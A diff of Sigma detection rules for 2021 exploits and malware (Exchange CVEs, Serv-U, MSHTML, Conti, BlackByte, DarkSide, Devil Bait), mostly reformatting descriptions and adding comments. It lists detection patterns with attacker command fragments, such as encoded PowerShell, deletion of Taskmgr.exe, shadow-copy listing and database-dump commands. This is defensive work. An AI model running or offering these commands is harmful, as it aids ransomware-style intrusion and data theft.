\Atlassian\Confluence\jre\bin\java.exe - CommandLine|contains: + CommandLine|contains: - certutil - cmd /c - cmd /k diff --git a/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-26857/proc_creation_win_exploit_cve_2021_26857_msexchange.yml b/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-26857/proc_creation_win_exploit_cve_2021_26857_msexchange.yml index 0f84ccbd4..e1d85d78b 100644 --- a/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-26857/proc_creation_win_exploit_cve_2021_26857_msexchange.yml +++ b/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-26857/proc_creation_win_exploit_cve_2021_26857_msexchange.yml @@ -1,9 +1,7 @@ title: Potential CVE-2021-26857 Exploitation Attempt id: cd479ccc-d8f0-4c66-ba7d-e06286f3f887 status: stable -description: Detects possible successful exploitation for vulnerability described - in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange - Server's Unified Messaging service +description: Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service references: - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/ author: Bhabesh Raj diff --git a/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-26858/file_event_win_cve_2021_26858_msexchange.yml b/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-26858/file_event_win_cve_2021_26858_msexchange.yml index 20b2110e0..a728e84f5 100644 --- a/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-26858/file_event_win_cve_2021_26858_msexchange.yml +++ b/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-26858/file_event_win_cve_2021_26858_msexchange.yml @@ -1,10 +1,10 @@ title: CVE-2021-26858 Exchange Exploitation id: b06335b3-55ac-4b41-937e-16b7f5d57dfd status: test -description: "Detects possible successful exploitation for vulnerability described\ - \ in CVE-2021-26858 by looking for\ncreation of non-standard files on disk by\ - \ Exchange Server\u2019s Unified Messaging service\nwhich could indicate dropping\ - \ web shells or other malicious content\n" +description: | + Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for + creation of non-standard files on disk by Exchange Server’s Unified Messaging service + which could indicate dropping web shells or other malicious content references: - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/ author: Bhabesh Raj diff --git a/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-35211/proc_creation_win_exploit_cve_2021_35211_servu.yml b/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-35211/proc_creation_win_exploit_cve_2021_35211_servu.yml index 7c17df0a1..55981f918 100644 --- a/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-35211/proc_creation_win_exploit_cve_2021_35211_servu.yml +++ b/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-35211/proc_creation_win_exploit_cve_2021_35211_servu.yml @@ -1,8 +1,7 @@ title: Serv-U Exploitation CVE-2021-35211 by DEV-0322 id: 75578840-9526-4b2a-9462-af469a45e767 status: test -description: Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 - vulnerability by threat group DEV-0322 +description: Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322 references: - https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/ author: Florian Roth (Nextron Systems) @@ -13,6 +12,7 @@ tags: - attack.t1136.001 - cve.2021.35211 - detection.emerging_threats + # - threat_group.DEV-0322 - sysmon logsource: category: process_creation @@ -22,13 +22,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_whoami: - CommandLine|contains: whoami + CommandLine|contains: whoami selection_cmd_1: - CommandLine|contains: + CommandLine|contains: - ./Client/Common/ - .\Client\Common\ selection_cmd_2: - CommandLine|contains: C:\Windows\Temp\Serv-U.bat + CommandLine|contains: C:\Windows\Temp\Serv-U.bat condition: process_creation and (selection_whoami and 1 of selection_cmd*) falsepositives: - Unlikely diff --git a/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-40444/file_event_win_exploit_cve_2021_40444.yml b/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-40444/file_event_win_exploit_cve_2021_40444.yml index b17e9abcb..cdd6d23ce 100644 --- a/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-40444/file_event_win_exploit_cve_2021_40444.yml +++ b/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-40444/file_event_win_exploit_cve_2021_40444.yml @@ -1,8 +1,7 @@ title: Suspicious Word Cab File Write CVE-2021-40444 id: 60c0a111-787a-4e8a-9262-ee485f3ef9d5 status: experimental -description: Detects file creation patterns noticeable during the exploitation of - CVE-2021-40444 +description: Detects file creation patterns noticeable during the exploitation of CVE-2021-40444 references: - https://twitter.com/RonnyTNL/status/1436334640617373699?s=20 - https://twitter.com/vanitasnk/status/1437329511142420483?s=21 diff --git a/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444.yml b/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444.yml index 4c07a180f..9c194f70a 100644 --- a/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444.yml +++ b/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444.yml @@ -1,8 +1,7 @@ title: Potential CVE-2021-40444 Exploitation Attempt id: 894397c6-da03-425c-a589-3d09e7d1f750 status: test -description: Detects potential exploitation of CVE-2021-40444 via suspicious process - patterns seen in in-the-wild exploitations +description: Detects potential exploitation of CVE-2021-40444 via suspicious process patterns seen in in-the-wild exploitations references: - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444 - https://twitter.com/neonprimetime/status/1435584010202255375 @@ -30,7 +29,7 @@ detection: - \powerpnt.exe - \excel.exe filter: - CommandLine|endswith: + CommandLine|endswith: - \control.exe input.dll - \control.exe" input.dll condition: process_creation and (selection and not filter) diff --git a/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml b/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml index 6a582ac3e..5bb5638e8 100644 --- a/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml +++ b/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml @@ -1,9 +1,7 @@ title: Potential Exploitation Attempt From Office Application id: 868955d9-697e-45d4-a3da-360cefd7c216 status: test -description: Detects Office applications executing a child process that includes directory - traversal patterns. This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) - or CVE-2021-40444 (MSHTML RCE) +description: Detects Office applications executing a child process that includes directory traversal patterns. This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE) references: - https://twitter.com/sbousseaden/status/1531653369546301440 - https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444 @@ -33,7 +31,7 @@ detection: - \mspub.exe - \eqnedt32.exe - \visio.exe - CommandLine|contains: + CommandLine|contains: - ../../../.. - ..\..\..\.. - ..//..//..//.. diff --git a/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-41379/file_event_win_cve_2021_41379_msi_lpe.yml b/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-41379/file_event_win_cve_2021_41379_msi_lpe.yml index a21db017b..9a637475e 100644 --- a/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-41379/file_event_win_cve_2021_41379_msi_lpe.yml +++ b/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-41379/file_event_win_cve_2021_41379_msi_lpe.yml @@ -1,8 +1,7 @@ title: InstallerFileTakeOver LPE CVE-2021-41379 File Create Event id: 3be82d5d-09fe-4d6a-a275-0d40d234d324 status: test -description: Detects signs of the exploitation of LPE CVE-2021-41379 that include - an msiexec process that creates an elevation_service.exe file +description: Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file references: - https://github.com/klinix5/InstallerFileTakeOver - https://www.zerodayinitiative.com/advisories/ZDI-21-1308/ diff --git a/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-41379/proc_creation_win_exploit_cve_2021_41379.yml b/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-41379/proc_creation_win_exploit_cve_2021_41379.yml index aae727616..415329558 100644 --- a/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-41379/proc_creation_win_exploit_cve_2021_41379.yml +++ b/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-41379/proc_creation_win_exploit_cve_2021_41379.yml @@ -1,10 +1,7 @@ title: Potential CVE-2021-41379 Exploitation Attempt id: af8bbce4-f751-46b4-8d91-82a33a736f61 status: test -description: Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), - a local privilege escalation (LPE) vulnerability where the attacker spawns a "cmd.exe" - process as a child of Microsoft Edge elevation service "elevation_service" with - "LOCAL_SYSTEM" rights +description: Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a "cmd.exe" process as a child of Microsoft Edge elevation service "elevation_service" with "LOCAL_SYSTEM" rights references: - https://web.archive.org/web/20220421061949/https://github.com/klinix5/InstallerFileTakeOver - https://www.bleepingcomputer.com/news/microsoft/new-windows-zero-day-with-public-exploit-lets-you-become-an-admin/ @@ -27,14 +24,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \cmd.exe - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - Cmd.Exe - - PowerShell.EXE - - pwsh.dll + - Image|endswith: + - \cmd.exe + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - Cmd.Exe + - PowerShell.EXE + - pwsh.dll selection_parent: ParentImage|endswith: \elevation_service.exe IntegrityLevel: System diff --git a/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-44077/file_event_win_cve_2021_44077_poc_default_files.yml b/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-44077/file_event_win_cve_2021_44077_poc_default_files.yml index 92b491ba8..a77fba75d 100644 --- a/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-44077/file_event_win_cve_2021_44077_poc_default_files.yml +++ b/sigma/sysmon/emerging-threats/2021/Exploits/CVE-2021-44077/file_event_win_cve_2021_44077_poc_default_files.yml @@ -1,9 +1,7 @@ title: CVE-2021-44077 POC Default Dropped File id: 7b501acf-fa98-4272-aa39-194f82edc8a3 status: test -description: Detects the creation of "msiexec.exe" in the "bin" directory of the ManageEngine - SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references - section) +description: Detects the creation of "msiexec.exe" in the "bin" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section) references: - https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/ - https://github.com/horizon3ai/CVE-2021-44077/blob/b7a48e25824e8ead95e028475c7fd0e107e6e6bf/exploit.py diff --git a/sigma/sysmon/emerging-threats/2021/Exploits/RazerInstaller-LPE-Exploit/proc_creation_win_exploit_other_razorinstaller_lpe.yml b/sigma/sysmon/emerging-threats/2021/Exploits/RazerInstaller-LPE-Exploit/proc_creation_win_exploit_other_razorinstaller_lpe.yml index fe12551f3..6486ed270 100644 --- a/sigma/sysmon/emerging-threats/2021/Exploits/RazerInstaller-LPE-Exploit/proc_creation_win_exploit_other_razorinstaller_lpe.yml +++ b/sigma/sysmon/emerging-threats/2021/Exploits/RazerInstaller-LPE-Exploit/proc_creation_win_exploit_other_razorinstaller_lpe.yml @@ -1,9 +1,7 @@ title: Suspicious RazerInstaller Explorer Subprocess id: a4eaf250-7dc1-4842-862a-5e71cd59a167 status: test -description: Detects a explorer.exe sub process of the RazerInstaller software which - can be invoked from the installer to select a different installation folder but - can also be exploited to escalate privileges to LOCAL SYSTEM +description: Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM references: - https://twitter.com/j0nh4t/status/1429049506021138437 - https://streamable.com/q2dsji @@ -29,7 +27,6 @@ detection: Image|startswith: C:\Windows\Installer\Razer\Installer\ condition: process_creation and (selection and not filter) falsepositives: - - User selecting a different installation folder (check for other sub processes - of this explorer.exe process) + - User selecting a different installation folder (check for other sub processes of this explorer.exe process) level: high ruletype: Sigma diff --git a/sigma/sysmon/emerging-threats/2021/Exploits/SystemNightmare-Exploit/proc_creation_win_exploit_other_systemnightmare.yml b/sigma/sysmon/emerging-threats/2021/Exploits/SystemNightmare-Exploit/proc_creation_win_exploit_other_systemnightmare.yml index 967fcbb66..c0ecdd00d 100644 --- a/sigma/sysmon/emerging-threats/2021/Exploits/SystemNightmare-Exploit/proc_creation_win_exploit_other_systemnightmare.yml +++ b/sigma/sysmon/emerging-threats/2021/Exploits/SystemNightmare-Exploit/proc_creation_win_exploit_other_systemnightmare.yml @@ -1,8 +1,7 @@ title: Potential SystemNightmare Exploitation Attempt id: c01f7bd6-0c1d-47aa-9c61-187b91273a16 status: test -description: Detects an exploitation attempt of SystemNightmare in order to obtain - a shell as LOCAL_SYSTEM +description: Detects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM references: - https://github.com/GossiTheDog/SystemNightmare author: Florian Roth (Nextron Systems) @@ -21,7 +20,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - printnightmare.gentilkiwi.com - ' /user:gentilguest ' - Kiwi Legit Printer diff --git a/sigma/sysmon/emerging-threats/2021/Exploits/file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml b/sigma/sysmon/emerging-threats/2021/Exploits/file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml index e694576c1..a3097e040 100644 --- a/sigma/sysmon/emerging-threats/2021/Exploits/file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml +++ b/sigma/sysmon/emerging-threats/2021/Exploits/file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml @@ -1,8 +1,7 @@ title: CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum id: ad7085ac-92e4-4b76-8ce2-276d2c0e68ef status: test -description: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 - CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum +description: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum references: - https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/ - https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/ @@ -16,6 +15,7 @@ tags: - cve.2021.33771 - cve.2021.31979 - detection.emerging_threats + # - threat_group.Sourgum - sysmon logsource: product: windows diff --git a/sigma/sysmon/emerging-threats/2021/Exploits/registry_set_cve_2021_31979_cve_2021_33771_exploits.yml b/sigma/sysmon/emerging-threats/2021/Exploits/registry_set_cve_2021_31979_cve_2021_33771_exploits.yml index b40d00d0a..d221164e7 100644 --- a/sigma/sysmon/emerging-threats/2021/Exploits/registry_set_cve_2021_31979_cve_2021_33771_exploits.yml +++ b/sigma/sysmon/emerging-threats/2021/Exploits/registry_set_cve_2021_31979_cve_2021_33771_exploits.yml @@ -1,8 +1,7 @@ title: CVE-2021-31979 CVE-2021-33771 Exploits id: 32b5db62-cb5f-4266-9639-0fa48376ac00 status: experimental -description: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 - CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum +description: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum references: - https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/ - https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/ @@ -16,6 +15,7 @@ tags: - cve.2021.33771 - cve.2021.31979 - detection.emerging_threats + # - threat_group.Sourgum - sysmon logsource: product: windows diff --git a/sigma/sysmon/emerging-threats/2021/Malware/BlackByte/proc_creation_win_malware_blackbyte_ransomware.yml b/sigma/sysmon/emerging-threats/2021/Malware/BlackByte/proc_creation_win_malware_blackbyte_ransomware.yml index af7a91958..6ae585c59 100644 --- a/sigma/sysmon/emerging-threats/2021/Malware/BlackByte/proc_creation_win_malware_blackbyte_ransomware.yml +++ b/sigma/sysmon/emerging-threats/2021/Malware/BlackByte/proc_creation_win_malware_blackbyte_ransomware.yml @@ -1,8 +1,7 @@ title: Potential BlackByte Ransomware Activity id: 999e8307-a775-4d5f-addc-4855632335be status: test -description: Detects command line patterns used by BlackByte ransomware in different - operations +description: Detects command line patterns used by BlackByte ransomware in different operations references: - https://redcanary.com/blog/blackbyte-ransomware/ author: Florian Roth (Nextron Systems) @@ -27,9 +26,9 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_1: Image|startswith: C:\Users\Public\ - CommandLine|contains: ' -single ' + CommandLine|contains: ' -single ' selection_2: - CommandLine|contains: + CommandLine|contains: - del C:\Windows\System32\Taskmgr.exe - ;Set-Service -StartupType Disabled $ - powershell -command "$x =[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( diff --git a/sigma/sysmon/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti.yml b/sigma/sysmon/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti.yml index 17b3b8cce..a14e0c920 100644 --- a/sigma/sysmon/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti.yml +++ b/sigma/sysmon/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti.yml @@ -20,7 +20,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - vssadmin list shadows - log.txt condition: process_creation and selection diff --git a/sigma/sysmon/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_7zip.yml b/sigma/sysmon/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_7zip.yml index e3cc5ba6a..a58e5d788 100644 --- a/sigma/sysmon/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_7zip.yml +++ b/sigma/sysmon/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_7zip.yml @@ -21,7 +21,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - 7za.exe - \\C$\\temp\\log.zip condition: process_creation and selection diff --git a/sigma/sysmon/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_ransomware_commands.yml b/sigma/sysmon/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_ransomware_commands.yml index 1a72ecc29..21ce45bde 100644 --- a/sigma/sysmon/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_ransomware_commands.yml +++ b/sigma/sysmon/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_ransomware_commands.yml @@ -22,10 +22,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - '-m ' - '-net ' - - '-size ' + - '-size ' # Size 10 in references - '-nomutex ' - -p \\\\ - $ diff --git a/sigma/sysmon/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_ransomware_database_dump.yml b/sigma/sysmon/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_ransomware_database_dump.yml index ec5a9d389..d74834054 100644 --- a/sigma/sysmon/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_ransomware_database_dump.yml +++ b/sigma/sysmon/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_ransomware_database_dump.yml @@ -3,7 +3,7 @@ id: 2f47f1fd-0901-466e-a770-3b7092834a1b status: test description: Detects a command used by conti to dump database references: - - https://twitter.com/vxunderground/status/1423336151860002816?s=20 + - https://twitter.com/vxunderground/status/1423336151860002816?s=20 # The leak info not the files itself - https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection - https://docs.microsoft.com/en-us/sql/tools/sqlcmd-utility?view=sql-server-ver15 author: frack113 @@ -22,14 +22,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_tools: - - Image|endswith: \sqlcmd.exe - - CommandLine|contains: - - 'sqlcmd ' - - sqlcmd.exe + - Image|endswith: \sqlcmd.exe + - CommandLine|contains: + - 'sqlcmd ' + - sqlcmd.exe selection_svr: - CommandLine|contains: ' -S localhost ' + CommandLine|contains: ' -S localhost ' selection_query: - CommandLine|contains: + CommandLine|contains: - sys.sysprocesses - master.dbo.sysdatabases - BACKUP DATABASE diff --git a/sigma/sysmon/emerging-threats/2021/Malware/DarkSide/proc_creation_win_malware_darkside_ransomware.yml b/sigma/sysmon/emerging-threats/2021/Malware/DarkSide/proc_creation_win_malware_darkside_ransomware.yml index ea85826a1..8a173be8a 100644 --- a/sigma/sysmon/emerging-threats/2021/Malware/DarkSide/proc_creation_win_malware_darkside_ransomware.yml +++ b/sigma/sysmon/emerging-threats/2021/Malware/DarkSide/proc_creation_win_malware_darkside_ransomware.yml @@ -21,7 +21,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection1: - CommandLine|contains: + CommandLine|contains: - =[char][byte]('0x'+ - ' -work worker0 -path ' selection2: diff --git a/sigma/sysmon/emerging-threats/2021/Malware/Devil-Bait/file_event_win_malware_devil_bait_script_drop.yml b/sigma/sysmon/emerging-threats/2021/Malware/Devil-Bait/file_event_win_malware_devil_bait_script_drop.yml index ef9bbfc6b..a64415e14 100644 --- a/sigma/sysmon/emerging-threats/2021/Malware/Devil-Bait/file_event_win_malware_devil_bait_script_drop.yml +++ b/sigma/sysmon/emerging-threats/2021/Malware/Devil-Bait/file_event_win_malware_devil_bait_script_drop.yml @@ -1,9 +1,7 @@ title: Potential Devil Bait Related Indicator id: 93d5f1b4-36df-45ed-8680-f66f242b8415 status: experimental -description: Detects the creation of ".xml" and ".txt" files in folders of the "\AppData\Roaming\Microsoft" - directory by uncommon processes. This behavior was seen common across different - Devil Bait samples and stages as described by the NCSC +description: Detects the creation of ".xml" and ".txt" files in folders of the "\AppData\Roaming\Microsoft" directory by uncommon processes. This behavior was seen common across different Devil Bait samples and stages as described by the NCSC references: - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/devil-bait/NCSC-MAR-Devil-Bait.pdf author: Nasreddine Bencherchali (Nextron Systems) @@ -24,6 +22,9 @@ detection: - \schtasks.exe - \wscript.exe - \mshta.exe + # Example folders used by the samples include: + # - %AppData%\Microsoft\Network\ + # - %AppData%\Microsoft\Office\ TargetFilename|contains: \AppData\Roaming\Microsoft\ TargetFilename|endswith: - .txt diff --git a/sigma/sysmon/emerging-threats/2021/Malware/Devil-Bait/proc_creation_win_malware_devil_bait_output_redirect.yml b/sigma/sysmon/emerging-threats/2021/Malware/Devil-Bait/proc_creation_win_malware_devil_bait_output_redirect.yml index 48eb18adf..db5e65b15 100644 --- a/sigma/sysmon/emerging-threats/2021/Malware/Devil-Bait/proc_creation_win_malware_devil_bait_output_redirect.yml +++ b/sigma/sysmon/emerging-threats/2021/Malware/Devil-Bait/proc_creation_win_malware_devil_bait_output_redirect.yml @@ -1,8 +1,8 @@ title: Potential Devil Bait Malware Reconnaissance id: e8954be4-b2b8-4961-be18-da1a5bda709c related: - - id: 8e0bb260-d4b2-4fff-bb8d-3f82118e6892 - type: derived + - id: 8e0bb260-d4b2-4fff-bb8d-3f82118e6892 + type: derived status: experimental description: Detects specific process behavior observed with Devil Bait samples references: @@ -25,12 +25,14 @@ detection: selection_redirect: ParentImage|endswith: \wscript.exe Image|endswith: \cmd.exe - CommandLine|contains: '>>%APPDATA%\Microsoft\' - CommandLine|endswith: + CommandLine|contains: '>>%APPDATA%\Microsoft\' + CommandLine|endswith: - .xml - .txt selection_recon_cmd: - CommandLine|contains: + CommandLine|contains: + # Taken from a6f9043627f8be2452153b5dbf6278e9b91763c3b5c2aea537a859e0c8c6b504 + # If you find samples using other commands please add them - dir - ipconfig /all - systeminfo diff --git a/sigma/sysmon/emerging-threats/2021/Malware/FoggyWeb/image_load_malware_foggyweb_nobelium.yml b/sigma/sysmon/emerging-threats/2021/Malware/FoggyWeb/image_load_malware_foggyweb_nobelium.yml index d9dedb11b..496f78e8e 100644 --- a/sigma/sysmon/emerging-threats/2021/Malware/FoggyWeb/image_load_malware_foggyweb_nobelium.yml +++ b/sigma/sysmon/emerging-threats/2021/Malware/FoggyWeb/image_load_malware_foggyweb_nobelium.yml @@ -1,8 +1,7 @@ title: FoggyWeb Backdoor DLL Loading id: 640dc51c-7713-4faa-8a0e-e7c0d9d4654c status: test -description: Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. - Which loads a malicious version of the expected "version.dll" dll +description: Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. Which loads a malicious version of the expected "version.dll" dll references: - https://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/ author: Florian Roth (Nextron Systems) diff --git a/sigma/sysmon/emerging-threats/2021/Malware/Goofy-Guineapig/proc_creation_win_malware_goofy_guineapig_broken_cmd.yml b/sigma/sysmon/emerging-threats/2021/Malware/Goofy-Guineapig/proc_creation_win_malware_goofy_guineapig_broken_cmd.yml index 18269e3b5..0e6c4d0a7 100644 --- a/sigma/sysmon/emerging-threats/2021/Malware/Goofy-Guineapig/proc_creation_win_malware_goofy_guineapig_broken_cmd.yml +++ b/sigma/sysmon/emerging-threats/2021/Malware/Goofy-Guineapig/proc_creation_win_malware_goofy_guineapig_broken_cmd.yml @@ -1,8 +1,7 @@ title: Potential Goofy Guineapig Backdoor Activity id: 477a5ed3-a374-4282-9f3b-ed94e159a108 status: experimental -description: Detects a specific broken command that was used by Goofy-Guineapig as - described by the NCSC report. +description: Detects a specific broken command that was used by Goofy-Guineapig as described by the NCSC report. references: - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf author: X__Junior (Nextron Systems) @@ -19,7 +18,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: choice /t %d /d y /n >nul + CommandLine|contains: choice /t %d /d y /n >nul condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/emerging-threats/2021/Malware/Goofy-Guineapig/proc_creation_win_malware_goofy_guineapig_googleupdate_uncommon_child_instance.yml b/sigma/sysmon/emerging-threats/2021/Malware/Goofy-Guineapig/proc_creation_win_malware_goofy_guineapig_googleupdate_uncommon_child_instance.yml index 03e4a3896..b79d2bca8 100644 --- a/sigma/sysmon/emerging-threats/2021/Malware/Goofy-Guineapig/proc_creation_win_malware_goofy_guineapig_googleupdate_uncommon_child_instance.yml +++ b/sigma/sysmon/emerging-threats/2021/Malware/Goofy-Guineapig/proc_creation_win_malware_goofy_guineapig_googleupdate_uncommon_child_instance.yml @@ -1,8 +1,7 @@ title: Potential Goofy Guineapig GoolgeUpdate Process Anomaly id: bdbab15a-3826-48fa-a1b7-723cd8f32fcc status: experimental -description: Detects "GoogleUpdate.exe" spawning a new instance of itself in an uncommon - location as seen used by the Goofy Guineapig backdoor +description: Detects "GoogleUpdate.exe" spawning a new instance of itself in an uncommon location as seen used by the Goofy Guineapig backdoor references: - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) @@ -22,10 +21,10 @@ detection: ParentImage|endswith: \GoogleUpdate.exe Image|endswith: \GoogleUpdate.exe filter_main_legit_paths: - - Image|startswith: - - C:\Program Files\Google\ - - C:\Program Files (x86)\Google\ - - Image|contains: \AppData\Local\Google\Update\ + - Image|startswith: + - C:\Program Files\Google\ + - C:\Program Files (x86)\Google\ + - Image|contains: \AppData\Local\Google\Update\ condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Unknown diff --git a/sigma/sysmon/emerging-threats/2021/Malware/Moriya-Rootkit/file_event_win_moriya_rootkit.yml b/sigma/sysmon/emerging-threats/2021/Malware/Moriya-Rootkit/file_event_win_moriya_rootkit.yml index d29c68c39..84672d311 100644 --- a/sigma/sysmon/emerging-threats/2021/Malware/Moriya-Rootkit/file_event_win_moriya_rootkit.yml +++ b/sigma/sysmon/emerging-threats/2021/Malware/Moriya-Rootkit/file_event_win_moriya_rootkit.yml @@ -1,12 +1,10 @@ title: Moriya Rootkit File Created id: a1507d71-0b60-44f6-b17c-bf53220fdd88 related: - - id: 25b9c01c-350d-4b95-bed1-836d04a4f324 - type: derived + - id: 25b9c01c-350d-4b95-bed1-836d04a4f324 + type: derived status: test -description: Detects the creation of a file named "MoriyaStreamWatchmen.sys" in a - specific location. This filename was reported to be related to the Moriya rootkit - as described in the securelist's Operation TunnelSnake report. +description: Detects the creation of a file named "MoriyaStreamWatchmen.sys" in a specific location. This filename was reported to be related to the Moriya rootkit as 